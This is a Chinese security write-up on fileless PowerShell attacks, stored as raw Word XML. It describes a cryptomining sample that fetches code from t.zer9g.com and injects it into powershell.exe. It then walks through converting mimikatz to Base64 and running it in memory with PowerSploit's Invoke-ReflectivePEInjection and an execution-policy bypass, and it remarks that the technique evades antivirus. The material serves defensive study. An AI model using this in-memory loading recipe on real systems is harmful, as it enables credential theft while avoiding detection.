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3580-1617095587279" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr/>
        <w:t>一、概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="5085-1617155332001" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="7774-1617096979400" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr/>
        <w:t>“无文件攻击”（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Fileless</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>）属于一种影响力非常大的安全威胁。攻击者在利用这种技术实施攻击时，不会在目标主机的磁盘上写入任何的恶意文件，因此而得名“无文件攻击”。现在挖矿病毒、勒索病毒多采用无文件攻击方式，从而可绕过常规杀毒软件的防护。powershell做为微软windows系统自带的软件包，具有十分强大的功能，越来越多的攻击者选用powershell做为攻击手段。PowerShell的主要作用是从远程位置下载恶意文件到受害者主机中，然后使用诸如Start-Porcess、Invoke-Item或者Invoke-Expression（-IEX）之类的命令执行恶意文件，PowerShell也可以将远程文件直接下载到受害者主机内存中，然后从内存中执行。多数情况下，powershell攻击活动中，攻击者会通过命令行进程调用powershell进程，也就是powershell的父进程通常是cmd.exe。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="5816-1617156738764" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr/>
        <w:t>二、powershell样本分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="4672-1617159108530" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr/>
        <w:t>从网上找了个powershell挖矿木马脚本，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>脚本利用了powershell -w -c参数来隐藏操作痕迹，-c即在powershll终端中执行任意命令，New-Object Net.WebClient</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>创建WebClient类的实例，FromBase64String将字符转化为二进制，WebClient对象就像其他图形界面的Web客户端一样，系统会访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>t.zer9g.com的a.jsp继续下载攻击模块，在将下载的程序注入powershell.exe进行运行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="5749-1617159103815" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5267325" cy="2039773"/>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5267325" cy="2039773"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="3450-1617157052039" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="7848-1617156757573" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="1061-1617156709231" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr/>
        <w:t>三、powershell内存加载程序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="5323-1617171382127" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr/>
        <w:t>将需要执行的程序加载到内存中执行已经成为一种常规手段，将病毒主程序进行二进制编码转化为字符串，生成powershell脚本，加载到内存中执行。此处尝试将mimikatz利用powershell加载内存中执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="2258-1617177951676" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr/>
        <w:t>1、将exe文件转换为字符串，可利用如下脚本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="4249-1617174384151" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr/>
        <w:t>function Convert-BinaryToString {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="4740-1617174426066" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   [CmdletBinding()] param (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="8388-1617174426066" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">      [string] $FilePath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="3577-1617174426066" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   )</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="6010-1617174426066" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   try {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="9013-1617174426066" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">      $ByteArray = [System.IO.File]::ReadAllBytes($FilePath);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="8771-1617174426066" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="1260-1617174426066" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   catch {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="8742-1617174426066" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">      throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct.";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="2160-1617174426066" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="5220-1617174426066" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   if ($ByteArray) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="8846-1617174426066" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">      $Base64String = [System.Convert]::ToBase64String($ByteArray);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="5173-1617174426066" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="2626-1617174426066" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   else {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="3150-1617174426066" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">      throw '$ByteArray is $null.';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="6011-1617174426066" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="6820-1617174426066" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   Write-Output -InputObject $Base64String;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="1925-1617174426066" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r>
        <w:rPr/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="9555-1617174429070" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r>
        <w:rPr/>
        <w:t>./base64.ps1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="3791-1617174692623" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r>
        <w:rPr/>
        <w:t>Convert-BinaryToString C:\Users\Administrator\Desktop\mimikatz_v2.0\x64\mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="5744-1617174733486" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5267325" cy="3336707"/>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267325" cy="3336707"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="1643-1617173801605" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r>
        <w:rPr/>
        <w:t>2、下载</w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r>
          <w:rPr>
            <w:color w:val="003884"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Invoke-ReflectivePEInjection.ps1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="393939"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="3867-1617175369190" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:hyperlink r:id="rId6">
        <w:r>
          <w:rPr>
            <w:color w:val="003884"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="5435-1617170568462" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r>
        <w:rPr/>
        <w:t>修改</w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r>
          <w:rPr>
            <w:color w:val="003884"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Invoke-ReflectivePEInjection.ps1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="393939"/>
        </w:rPr>
        <w:t>脚本，加入如下内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="1579-1617176035494" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r>
        <w:rPr/>
        <w:t>$InputString = '...........'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="3194-1617176041383" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r>
        <w:rPr/>
        <w:t># 将二进制字符串转为字节数组</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="3813-1617176041383" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r>
        <w:rPr/>
        <w:t>$PEBytes = [System.Convert]::FromBase64String($InputString)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="1822-1617176041383" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r>
        <w:rPr/>
        <w:t># 在内存中运行 EXE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="8135-1617176041383" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r>
        <w:rPr/>
        <w:t>Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="8378-1617176104447" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5267325" cy="2359762"/>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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267325" cy="2359762"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="7641-1617158783166" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r>
        <w:rPr/>
        <w:t>3、powershell中执行powershell -exec bypass -File test.ps1，可成功打开mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="5161-1617176376669" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5267325" cy="2849229"/>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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267325" cy="2849229"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="9423-1617176234950" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r>
        <w:rPr/>
        <w:t>最后在说下反射型dll注入，它不需要像传统的注入方式一样需要DLL落地存储，避免了注入DLL被安全软件删除的危险。由于它没有通过系统API对DLL进行装载，操作系统无从得知被注入进程装载了该DLL，所以检测软件也无法检测它。同时，由于操作流程和一般的注入方式不同，反射式DLL注入被安全软件拦截的概率也会比一般的注入方式低。关于反射型dll注入技术内容要复杂的多，以上只是利用</w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r>
          <w:rPr>
            <w:color w:val="003884"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Invoke-ReflectivePEInjection.ps1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>做了最简单演示。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="6078-1617178050711" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r>
        <w:rPr/>
        <w:t>四、小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="2437-1617178018113" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r>
        <w:rPr/>
        <w:t>在未来基于无文件攻击的网络犯罪活动依然会持续增加，并将成为主流的网络攻击方式之一，网络攻击犯罪团队可以通过这种方式，在受害者主机上留下最少的犯罪痕迹，受害者主机上无落地的PE恶意软件，恶意软件作者通过采用这种无文件攻击的方式逃避或推迟一些安全厂商安全产品的检测，因为不管是传统的PE杀毒检测引擎，还是现在流行的AI人工智能PE检测引擎针对这类无文件的攻击样本的检测，基本上是没有什么效果的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="2453-1617178519646" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r>
        <w:rPr/>
        <w:t>参考文章：https://bbs.pediy.com/thread-253375.htm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="6126-1617156779111" w:id="48"/>
      <w:bookmarkEnd w:id="48"/>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https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/>
<Relationship Id="rId2" Target="styles.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"/>
<Relationship Id="rId3" Target="media/image1.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/>
<Relationship Id="rId4" Target="media/image2.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/>
<Relationship Id="rId5" Target="https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/>
<Relationship Id="rId6" Target="https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/>
<Relationship Id="rId7" Target="https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/>
<Relationship Id="rId8" Target="media/image3.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/>
<Relationship Id="rId9" Target="media/image4.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2021-03-31T08:17:57Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
</cp:coreProperties>
</file>